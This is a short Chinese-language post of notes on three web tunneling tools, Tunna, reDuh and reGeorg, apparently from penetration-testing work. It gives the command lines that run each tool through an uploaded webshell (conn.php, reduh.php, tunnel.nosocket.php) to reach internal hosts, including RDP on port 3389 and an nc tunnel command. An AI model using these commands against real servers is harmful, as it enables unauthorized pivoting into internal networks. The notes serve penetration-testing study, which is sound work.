最近的工作用到了这块,找了几个工具学了学
Web隧道工具
Tunna
https://github.com/SECFORCE/Tunna
将webshell目录的脚本上传到目标站conn.php,在本地执行
python proxy.py -u http://172.0.0.1/conn.php -l 1234 -a 172.0.0.2 -r 3389
172.0.0.1是webshell所在服务器,172.0.0.2是内网访问的服务器,3389为远程终端端口,有些服务器修改器默认端口为其它端口。本地直接登录远程终端地址127.0.0.1:1234即可.
reDuh
https://github.com/sensepost/reDuh
reDuh使用方法
攻击机执行
sudo java -jar reDuhClient.jar http://192.168.16.108:8080/reduh.php
然后
nc -vv localhost 1010 连接上之后输入
[createTunnel]1234:127.0.0.1:3389
访问
http://127.0.0.1:55555/
reGeorg
https://github.com/sensepost/reGeorg
python reGeorgSocksProxy.py -p 9999 -u http://192.168.16.108:8080/tunnel.nosocket.php